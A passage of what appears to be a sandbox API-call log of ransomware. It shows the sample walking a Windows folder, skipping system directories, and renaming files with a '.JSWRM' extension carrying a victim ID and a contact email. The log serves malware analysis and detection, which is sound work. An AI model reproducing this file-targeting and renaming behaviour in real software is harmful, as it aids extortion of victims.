dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.488] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9658659896446696) returned 0 [0068.488] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.489] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.489] CloseHandle (hObject=0xffffffff) returned 1 [0068.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0068.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0068.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.489] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.489] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1ec00, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0068.489] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2=".") returned 1 [0068.489] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="..") returned 1 [0068.489] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="...") returned 1 [0068.489] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="windows") returned -1 [0068.489] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="recovery") returned -1 [0068.489] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="perflogs") returned -1 [0068.489] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="documents and settings") returned 1 [0068.489] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.490] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="system volume information") returned -1 [0068.490] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="msocache") returned -1 [0068.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsPlugin.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsPlugin.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsPlugin.dll", lpUsedDefaultChar=0x0) returned 13 [0068.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsPlugin.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsPlugin.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsPlugin.dll", lpUsedDefaultChar=0x0) returned 13 [0068.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.490] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2=".") returned 1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="..") returned 1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="...") returned 1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="windows") returned -1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="recovery") returned -1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="perflogs") returned -1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="documents and settings") returned 1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="system volume information") returned -1 [0068.490] lstrcmpiW (lpString1="ipsptb.xml", lpString2="msocache") returned -1 [0068.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsptb.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsptb.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsptb.xml", lpUsedDefaultChar=0x0) returned 10 [0068.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsptb.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsptb.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsptb.xml", lpUsedDefaultChar=0x0) returned 10 [0068.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.491] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9652234625370928) returned 0 [0068.491] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.491] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.491] CloseHandle (hObject=0xffffffff) returned 1 [0068.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.491] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.491] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0068.491] lstrcmpiW (lpString1="ipsptg.xml", lpString2=".") returned 1 [0068.491] lstrcmpiW (lpString1="ipsptg.xml", lpString2="..") returned 1 [0068.491] lstrcmpiW (lpString1="ipsptg.xml", lpString2="...") returned 1 [0068.492] lstrcmpiW (lpString1="ipsptg.xml", lpString2="windows") returned -1 [0068.492] lstrcmpiW (lpString1="ipsptg.xml", lpString2="recovery") returned -1 [0068.492] lstrcmpiW (lpString1="ipsptg.xml", lpString2="perflogs") returned -1 [0068.492] lstrcmpiW (lpString1="ipsptg.xml", lpString2="documents and settings") returned 1 [0068.492] lstrcmpiW (lpString1="ipsptg.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.492] lstrcmpiW (lpString1="ipsptg.xml", lpString2="system volume information") returned -1 [0068.492] lstrcmpiW (lpString1="ipsptg.xml", lpString2="msocache") returned -1 [0068.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsptg.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsptg.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsptg.xml", lpUsedDefaultChar=0x0) returned 10 [0068.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsptg.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsptg.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsptg.xml", lpUsedDefaultChar=0x0) returned 10 [0068.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.492] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9659828127550120) returned 0 [0068.492] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.492] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.492] CloseHandle (hObject=0xffffffff) returned 1 [0068.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.493] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.496] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c96711d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c96711d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2=".") returned 1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="..") returned 1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="...") returned 1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="windows") returned -1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="recovery") returned -1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="perflogs") returned -1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="documents and settings") returned 1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="system volume information") returned -1 [0068.496] lstrcmpiW (lpString1="ipsrom.xml", lpString2="msocache") returned -1 [0068.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsrom.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsrom.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsrom.xml", lpUsedDefaultChar=0x0) returned 10 [0068.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsrom.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsrom.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsrom.xml", lpUsedDefaultChar=0x0) returned 10 [0068.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.497] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9655155203134792) returned 0 [0068.497] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 